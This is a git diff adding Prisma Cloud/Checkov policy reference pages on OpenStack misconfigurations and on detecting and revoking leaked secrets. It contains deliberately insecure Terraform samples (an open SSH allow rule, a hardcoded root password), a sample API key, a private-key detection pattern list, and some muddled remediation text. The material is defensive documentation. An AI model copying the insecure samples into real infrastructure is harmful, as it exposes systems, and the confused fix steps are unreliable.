a/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-firewall-rule-has-destination-ip-configured.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-firewall-rule-has-destination-ip-configured.adoc new file mode 100644 index 000000000..482aac047 --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-firewall-rule-has-destination-ip-configured.adoc @@ -0,0 +1,62 @@ +== OpenStack firewall rule does not have destination IP configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 245d30b8-6f46-40c1-bc54-a0a80347c436 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py[CKV_OPENSTACK_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Explicitly setting a destination IP Address will make sure that the IP destination is managed in code. +You also need to ensure that the destination IP is not 0.0.0.0 so that the firewall rule is exposed to the world. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* openstack_fw_rule_v1 +* *Arguments:* destination_ip_address + +[source,go] +---- +resource "openstack_fw_rule_v1" "fail" { +name = "my_rule_world" +description = "let anyone in" +action = "allow" +protocol = "tcp" +destination_port = "22" +enabled = "true" +} +---- + + + +*CLI* + + +---- +openstack firewall group rule create --destination-ip-address 10.0.0.1 +---- diff --git a/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-instance-does-not-use-basic-credentials.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-instance-does-not-use-basic-credentials.adoc new file mode 100644 index 000000000..6fee94630 --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-instance-does-not-use-basic-credentials.adoc @@ -0,0 +1,59 @@ +== OpenStack instance use basic credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0784c873-e95d-4b13-ae13-aa50dcf28bd3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py[CKV_OPENSTACK_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +When managing a compute instance in Terraform, you can override the root password using admin_pass. +However, this is stored in plaintext and therefore exposes the root password to credential theft. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* openstack_compute_instance_v2 +* *Arguments:* admin_pass + +[source,go] +---- +resource "openstack_compute_instance_v2" "fail" { + name = "basic" + image_id = "ad091b52-742f-469e-8f3c-fd81cadf0743" + flavor_id = "3" +- admin_pass = "N0tSoS3cretP4ssw0rd" + security_groups = ["default"] + user_data = "#cloud-config + hostname: instance_1.example.com + fqdn: instance_1.example.com" + + network { + name = "my_network" + } +} +---- diff --git a/code-security/policy-reference/openstack-policies/openstack-policy-index/openstack-policy-index.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/openstack-policy-index.adoc new file mode 100644 index 000000000..f0f984896 --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/openstack-policy-index.adoc @@ -0,0 +1,24 @@ +== Openstack Policy Index + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-openstack-networking-2.adoc[OpenStack Security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py[CKV_OPENSTACK_3] +|LOW + + +|xref:ensure-openstack-firewall-rule-has-destination-ip-configured.adoc[OpenStack firewall rule does not have destination IP configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py[CKV_OPENSTACK_5] +|LOW + + +|xref:ensure-openstack-instance-does-not-use-basic-credentials.adoc[OpenStack instance use basic credentials] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py[CKV_OPENSTACK_4] +|LOW + + +|=== + diff --git a/code-security/policy-reference/secrets-policies/secrets-policies.adoc b/code-security/policy-reference/secrets-policies/secrets-policies.adoc new file mode 100644 index 000000000..7d4d35ca9 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policies.adoc @@ -0,0 +1,3 @@ +== Secrets Policies + + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/ensure-repository-is-private.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/ensure-repository-is-private.adoc new file mode 100644 index 000000000..66ca949d2 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/ensure-repository-is-private.adoc @@ -0,0 +1,44 @@ +== GitHub repository is not Private + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f620ff53-e5d6-45a1-b68b-83bc35f7e946 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/PrivateRepo.py[CKV_GIT_1] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +When you create a Cloud repository, you specify whether it's private or public, but you can also change this setting at any time. +If your repository is public, anyone can access and fork it. +If your repository is private, you can specify who exactly can access your repository and whether they can fork it. + +=== Fix - Buildtime + + +*GitHub *Warning: This may break references to the repository** + + +* On GitHub.com, navigate to the repository. +* In the menu bar under the repository name click on Settings +* In the "Danger Zone" section, click on "Change repository visibility" +* Choose private diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-1.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-1.adoc new file mode 100644 index 000000000..23db979c4 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-1.adoc @@ -0,0 +1,83 @@ +== Artifactory Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a3934796-b64a-4295-849f-417651ecae8b + +|Checkov Check ID +|CKV_SECRET_1 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Artifactory is a Repository Manager that functions as a single access point organizing all of your binary resources including proprietary libraries, remote artifacts and other 3rd party resources. + + +[source,text] +---- +{ + " apikey: AKCp5budTFpbypBqQbGJPz3pGCi28pPivfWczqjfYb9drAmd9LbRZbj6UpKFxJXA8ksWGc9fM", +} +---- + +=== Fix - Buildtime + + +*Artifactory* + + + +. Revoke the exposed secret. ++ +The key can be revoked from the user profile or through the API. ++ + +[source,text] +---- +{ + "## Revoke API Key +Description: Revokes the current user's API key +Since: 4.3.0 +Usage: DELETE /api/security/apiKey +Produces: application/json + +## Revoke User API Key +Description: Revokes the API key of another user +Since: 4.3.0 +Security: Requires a privileged user (Admin only) +Usage: DELETE /api/security/apiKey/{username} +Produces: application/json + +## Revoke All API Keys +Description: Revokes all API keys currently defined in the system +Since: 4.3.0 +Security: Requires a privileged user (Admin only) +Usage: DELETE /api/security/apiKey?deleteAll={0/1} +Produces: application/json", + +} +---- + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Inspect Jfrog access logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-11.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-11.adoc new file mode 100644 index 000000000..dd040d25e --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-11.adoc @@ -0,0 +1,57 @@ +== Mailchimp Access Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 73ce6819-d605-4d89-a126-69eb2cd099f1 + +|Checkov Check ID +|CKV_SECRET_11 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +This check detects a Mailchimp access key referenced in your source code. +The key enables an authenticated user to perform operational and management activities exposed by Mailchimp's developer API service. + +=== Fix - Buildtime + + +*Mailchimp* + + + +. Revoke Secret. ++ +An activated API Key can be deactivated from the Mailchimp dashboard under the Extras/API Key tab. + +. Go to https://us1.admin.mailchimp.com/account/api/ to open the API Keys section of your account. + +. Find the API key you want to disable, and toggle the slider in the Status column for that API key. + +. Find the API key you want to disable and click Disable. + +. In the pop-up modal, click Disable. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Check the API calls logs in the Mailchimp dashboard to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-12.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-12.adoc new file mode 100644 index 000000000..78bd8204e --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-12.adoc @@ -0,0 +1,65 @@ +== NPM Token + +Token + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 46bfa5d5-df04-4390-85ce-f312d62677f4 + +|Checkov Check ID +|CKV_SECRET_12 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The NPM access token can be used to authenticate to npm when using the API or the npm command-line interface (CLI). +An access token is a hexadecimal string that you can use to authenticate, and which gives you the right to install and/or publish your modules. + +=== Fix - Buildtime + + +*NPM* + + + +. Revoke Secret. + +. To see a list of your tokens, on the command line, run: + +---- +npm token list +---- + +. In the tokens table, find and copy the ID of the token you want to delete. +On the command line, run the following command, replacing 123456 with the ID of the token you want to delete: + +---- +npm token delete 123456 +npm will report Removed 1 token +---- + +. To confirm that the token has been removed, run: + +---- +npm token list +---- + +. Clean the git history. +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-13.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-13.adoc new file mode 100644 index 000000000..ea7845dea --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-13.adoc @@ -0,0 +1,56 @@ +== Private Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f9c21f44-a326-4f6d-8984-d2a8cffbd0bd + +|Checkov Check ID +|CKV_SECRET_13 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +This check detects private keys by determining whether commonly specified key attributes are present in the analyzed string. +---- +DSA PRIVATE KEY +EC PRIVATE KEY +OPENSSH PRIVATE KEY +PGP PRIVATE KEY BLOCK +PRIVATE KEY +RSA PRIVATE KEY +SSH2 ENCRYPTED PRIVATE KEY +PuTTY-User-Key-File-2 +---- + +=== Fix - Buildtime + + +*Multiple Services* + + + +. Revoke the exposed secret. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Inspect your application's access logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-14.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-14.adoc new file mode 100644 index 000000000..1f70dbfe7 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-14.adoc @@ -0,0 +1,52 @@ +== Slack Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bdbbce4e-76c0-47f5-9000-909b259281eb + +|Checkov Check ID +|CKV_SECRET_14 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Slack API tokens can be created for both members and bot users. +For added security, it is recommended to rotate these tokens periodically. +Slack will automatically revoke old tokens if they remain unused for long periods of time. + +=== Fix - Buildtime + + +*Slack* + + + +. Revoke the exposed secret. ++ +Go to http://api.slack.com/methods/auth.revoke/test[auth.revoke] to revoke your token. ++ +Method URL: https://slack.com/api/auth.revoke Preferred HTTP method: GET Accepted content types: application/x-www-form-urlencoded + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Inspect Slack's Events API log to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-15.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-15.adoc new file mode 100644 index 000000000..914aff111 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-15.adoc @@ -0,0 +1,46 @@ +== SoftLayer Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 66c63576-47c9-4ea7-9886-afc728739003 + +|Checkov Check ID +|CKV_SECRET_15 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +SoftLayer Technologies, Inc. +(now IBM Cloud) was a dedicated server, managed hosting, and cloud computing provider, founded in 2005 and acquired by IBM in 2013. +SoftLayer initially specialized in hosting workloads for gaming companies and startups, but shifted focus to enterprise workloads after its acquisition. + +=== Fix - Buildtime + + +*IBM Cloud* + + + +. Revoke the exposed secret. + +. Clean the git history. + +. Inspect IBM Cloud logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-16.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-16.adoc new file mode 100644 index 000000000..52d6be313 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-16.adoc @@ -0,0 +1,58 @@ +== Square OAuth Secret + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f32d4d2f-c3b4-4adb-93c4-48515d796758 + +|Checkov Check ID +|CKV_SECRET_16 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Square OAuth API uses the OAuth 2 protocol to get permission from the owner of the seller account to manage specific types of resources in that account. + +=== Fix - Buildtime + + +*Square* + + + +. Revoke the exposed secret. ++ +`POST /oauth2/revoke`: Revokes an access token generated with the OAuth flow. ++ +If an account has more than one OAuth access token for your application, this endpoint revokes all of them, regardless of which token you specify. ++ +When an OAuth access token is revoked, all of the active subscriptions associated with that OAuth token are canceled immediately. ++ +Replace APPLICATION_SECRET with the application secret on the OAuth page in the developer dashboard. ++ + +[source,text] +---- +{ + "Authorization: Client APPLICATION_SECRET", +} +---- + +. Clean the git history. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-17.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-17.adoc new file mode 100644 index 000000000..7eb97b530 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-17.adoc @@ -0,0 +1,51 @@ +== Stripe Access Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53b697f8-bac9-4c27-8d37-ca29e62f7af5 + +|Checkov Check ID +|CKV_SECRET_17 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Stripe authenticates your API requests using your account's API keys. +If you do not include your key when making an API request, or use one that is incorrect or outdated, Stripe returns an error. +Secret API keys should be kept confidential and only stored on your own servers. +Your account's secret API key can perform any API request to Stripe without restriction. + +=== Fix - Buildtime + + +*Stripe* + + + +. Revoke the exposed secret. ++ +Users with Administrator permissions can access a Stripe account's API keys by navigating to the Developers section of the Stripe dashboard and clicking on API Keys. ++ +If you no longer need a restricted key (or you suspect it has been compromised), you can revoke it at any time. ++ +You can also edit the key to change its level of access. + +. Clean the git history. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-18.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-18.adoc new file mode 100644 index 000000000..952a69341 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-18.adoc @@ -0,0 +1,60 @@ +== Twilio Access Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b72b7eaf-c8b9-4711-a646-6bb6aca7f922 + +|Checkov Check ID +|CKV_SECRET_18 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Twilio Access Tokens are short-lived tokens that you can use to authenticate Twilio Client SDKs like Voice, Conversations, Sync, and Video. +You create them on your server to verify a client's identity and grant access to client API features. +All tokens have a limited lifetime, configurable up to 24 hours. +However, a best practice is to generate Access Tokens for the shortest amount of time feasible for your application. + +=== Fix - Buildtime + + +*Twilio* + + + +. Revoke the exposed secret. ++ +The following method deletes an API Key. ++ +This revokes its authorization to authenticate to the REST API and invalidates all Access Tokens generated using its secret. ++ +If the delete is successful, Twilio will return an HTTP 204 response with no body. ++ + +[source,text] +---- +{ + "DELETE https://api.twilio.com/2010-04-01/Accounts/{AccountSid}/Keys/{Sid}.json", +} +---- + + +. Clean the git history. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-19.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-19.adoc new file mode 100644 index 000000000..d435e1e64 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-19.adoc @@ -0,0 +1,52 @@ +== Hex High Entropy String + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a9c6ddac-78da-4928-a3e7-8662bb33f2c5 + +|Checkov Check ID +|CKV_SECRET_19 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Password Entropy is a concept used to assign a numerical score to how unpredictable a password is or the likelihood of highly random data in a string of characters. +The policy calculates entropy levels using a Shannon Entropy calculator. +The entropy levels of keys are important, as the more or less information required to determine unknown key variables can alter how difficult it is to crack. +If a high-entropy string is detected, the string is printed to the screen. +This check scans the branch and evaluates the entropy for both the hexadecimal character set for every blob of text. + +=== Fix - Buildtime + + +*Multiple Services* + + + +. Revoke the exposed secret. ++ +Start by understanding what services were impacted and refer to the corresponding API documentation to learn how to revoke and rotate the secret. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Check any relevant access logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-2.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-2.adoc new file mode 100644 index 000000000..52c2a3d5d --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-2.adoc @@ -0,0 +1,62 @@ +== AWS Access Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a98f67ca-d303-4bd5-b31b-88ef2d894b2f + +|Checkov Check ID +|CKV_SECRET_2 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +AWS Access Keys are long-term credentials for an IAM user or the AWS account root user. +You can use access keys to sign programmatic requests to the AWS CLI or AWS API (directly or using the AWS SDK). +Access keys consist of two parts: an access key ID (for example, `AKIAIOSFODNN7EXAMPLE`) and a secret access key (for example, `wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY`). + +=== Fix - Buildtime + + +*AWS* + + + +. Revoke the exposed secret. + +. Sign in to the AWS Identity and Access Management (IAM) console as the root user. + +. Choose your account name on the navigation bar, and then choose My Security Credentials. + +. If you see a warning about accessing the security credentials, choose Continue to security credentials. + +. Expand the Access keys (access key ID and secret access key) section. + +. Choose Delete next to the access key that you want to delete. ++ +In the confirmation box, choose Yes. ++ +Expand the "Access keys" section then click on the delete button. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Inspect AWS CloudTrail access logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-21.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-21.adoc new file mode 100644 index 000000000..10b183f35 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-21.adoc @@ -0,0 +1,45 @@ +== Airtable API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8058279d-25be-4115-bd84-6b830faa3c5d + +|Checkov Check ID +|CKV_SECRET_21 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Airtable is a spreadsheet-database hybrid, with the features of a database but applied to a spreadsheet. +The fields in an Airtable table are similar to cells in a spreadsheet, but have types such as 'checkbox', 'phone number', and 'drop-down list', and can reference file attachments like images. +Users can create a database, set up column types, add records, link tables to one another, collaborate, sort records and publish views to external websites. +The Airtable Airtable API key allows users to use our public API to create, fetch, update, and delete records in the bases you have access to in Airtable. +API keys follow the same permissions that an account has in the Airtable UI. + +=== Fix - Buildtime + + +*Airtable If you accidentally reveal your API key, you should regenerate your API key as soon as possible at https://airtable.com/account.* + + +To delete your key, click the Delete key option. +This will bring up a warning that deleting your key will break your API integrations. +Click the red Yes, delete key button to confirm your key deletion. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-22.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-22.adoc new file mode 100644 index 000000000..71e64d54c --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-22.adoc @@ -0,0 +1,46 @@ +== Algolia Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1ea47a16-0199-4117-93f9-01de3fcdd814 + +|Checkov Check ID +|CKV_SECRET_22 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Algolia is a proprietary search engine offering, usable through the software as a service (SaaS) model. +API keys are necessary to work with Algolia. +They give you code-level access to your account, data, and index settings. +Whether you're sending or updating your data, searching your index, or doing anything else with Algolia's API, you need to use a valid API key. + +=== Fix - Buildtime + + +*Algolia Revoking an API key makes it unusable.* + + +It's crucial to revoke any compromised key, for example, a leaked write API key, a search API key being abused. +However, keep in mind that you need to update your applications to avoid breaking them when the key they use becomes invalid. +You can revoke an API key by deleting it from the dashboard, or through the API, with the deleteApiKey method. +When deleting a main API key, you're also deleting all derived Secured API keys. +You can never restore Secured API keys, even if you later restore the main key. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-23.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-23.adoc new file mode 100644 index 000000000..36fe164b9 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-23.adoc @@ -0,0 +1,80 @@ +== Alibaba Cloud Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 34a51c97-a8be-444b-816b-06ff2c99b462 + +|Checkov Check ID +|CKV_SECRET_23 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Alibaba Cloud Key Management Service (KMS) provides secure and compliant key management and cryptography services to help you encrypt and protect sensitive data assets. +KMS is integrated with a wide range of Alibaba Cloud services to allow you to encrypt data across the cloud and to control its distributed environment. +KMS provides key usage logs via ActionTrail, supports custom key rotation, and provides HSMs that have passed FIPS 140-2 Level 3 or other relevant validation, to help you meet your regulatory and compliance needs. + +=== Fix - Buildtime + + +*Alibaba* + + + + +*Fix - Delete* + + + +. Log on to the RAM console by using your Alibaba Cloud account. + +. In the left-side navigation pane, choose Identities > Users. + +. On the Users page, click the username of a specific RAM user. + +. In the User AccessKeys section of the page that appears, find the specific AccessKey pair and click Delete in 5. ++ +the Actions column. + +. Click OK. + + +*Fix - Rotate* + + + +. Create an AccessKey pair for rotation. + +. Update all applications and systems to use the new AccessKey pair. + +. Disable the original AccessKey pair. + +. Confirm that your applications and systems are properly running. ++ +If the applications and systems are properly running, the update succeeds. ++ +You can delete the original AccessKey pair. + +. If an application or system stops running, you must enable the original AccessKey pair, and repeat Step 2 to Step 4 until the update succeeds. + +. Delete the original AccessKey pair. ++ +For more information, see Delete an AccessKey pair. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-24.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-24.adoc new file mode 100644 index 000000000..886d810fd --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-24.adoc @@ -0,0 +1,48 @@ +== Asana Key + +It helps teams manage projects and tasks in one tool. +Teams can create projects, assign work to teammates, specify deadlines, and communicate about tasks directly in Asana. +It also includes reporting tools, file attachments, calendars, as well as setting and tracking company wide goals. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 250a1587-69ae-4878-8a7c-6c300eb9132f + +|Checkov Check ID +|CKV_SECRET_24 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +A user can create many, but not unlimited, personal access tokens. +When creating a token you must give it a description to help you remember what you created the token for. +Personal Access Tokens should be used similarly to OAuth access tokens when accessing the API, passing them in the Authorization header. +You can generate a Personal Access Token from the Asana developer console. +See the Authentication Quick Start for detailed instructions on getting started with PATs. + +=== Fix - Buildtime + + +*Asana An authorization token can be deauthorized or invalidated by making a request to Asana's API.* + + +Your app should make a POST request to https://app.asana.com/-/oauth_revoke, passing the parameters as part of a standard form-encoded post body. +The body should include a valid Refresh Token, which will cause the Refresh Token and any Associated Bearer Tokens to be deauthorized. +Bearer Tokens are not accepted in the request body since a new Bearer Token can always be obtained by reusing an authorized Refresh Token. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-25.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-25.adoc new file mode 100644 index 000000000..6e84526a9 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-25.adoc @@ -0,0 +1,48 @@ +== Atlassian Oauth2 Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 550b4cdd-b107-4bd7-8397-a38b8e32f713 + +|Checkov Check ID +|CKV_SECRET_25 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +OAuth is an authorization protocol that contains an authentication step. +OAuth allows a user (resource owner) to grant a third-party application (consumer/client) access to their information on another site (resource). +This process is commonly known as the OAuth dance. +Jira uses 3-legged OAuth (3LO), which means that the user is involved by authorizing access to their data on the resource (as opposed to 2-legged OAuth, where the user is not involved). +In Jira, a client is authenticated as the user involved in the OAuth dance and is authorized to have read and write access as that user. +The data that can be retrieved and changed by the client is controlled by the user's permissions in Jira. +The authorization process works by getting the resource owner to grant access to their information on the resource by authorizing a request token. +This request token is used by the consumer to obtain an access token from the resource. +Once the client has an access token, it can use the access token to make authenticated requests to the resource until the token expires or is revoked. + +=== Fix - Buildtime + + +*Atlassian Services You can only delete an app if it's not installed anywhere.* + + +If your app is currently installed on a site, uninstall it. +Select Settings in the left menu, and select Delete app. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-26.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-26.adoc new file mode 100644 index 000000000..627922a80 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-26.adoc @@ -0,0 +1,40 @@ +== Auth0 Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8ebec33d-9b5e-4a9d-8796-0da742b67bef + +|Checkov Check ID +|CKV_SECRET_26 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +All Auth0-issued JWTs have JSON Web Signatures (JWSs), meaning they are signed rather than encrypted. +A JWS represents content secured with digital signatures or Message Authentication Codes (MACs) using JSON-based data structures. + +=== Fix - Buildtime + + +*Auth0 Once issued, access tokens and ID tokens cannot be revoked in the same way as cookies with session IDs for server-side sessions.* + + +As a result, tokens should be issued for relatively short periods, and then refreshed periodically if the user remains active. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-27.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-27.adoc new file mode 100644 index 000000000..029ad837b --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-27.adoc @@ -0,0 +1,45 @@ +== Bitbucket Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| afcada96-ce49-4e3a-b05a-c72da1b68083 + +|Checkov Check ID +|CKV_SECRET_27 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Bitbucket Cloud REST API integrations, and Atlassian Connect for Bitbucket add-ons, can use OAuth 2.0 to access resources in Bitbucket. +For obtaining access/bearer tokens, we support three of RFC-6749's grant flows, plus a custom Bitbucket flow for exchanging JWT tokens for access tokens. +Client ID: Stores the identifier that the authorization service uses to validate a login request. +You generate this value in the authorization service when you configure the authorization settings for a web application and enter an authorized redirect URI. +Client Secret: Stores the secret or password used to validate the client ID. +You generate this value in the authorization service together with the client ID. + +=== Fix - Buildtime + + +*Bitbucket Access tokens expire in two hours.* + + +When this happens you'll get 401 responses. +Most access token grant response therefore include a refresh token that can then be used to generate a new access token, without the need for end user participation: diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-28.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-28.adoc new file mode 100644 index 000000000..67b404cf9 --- /dev/null +++ 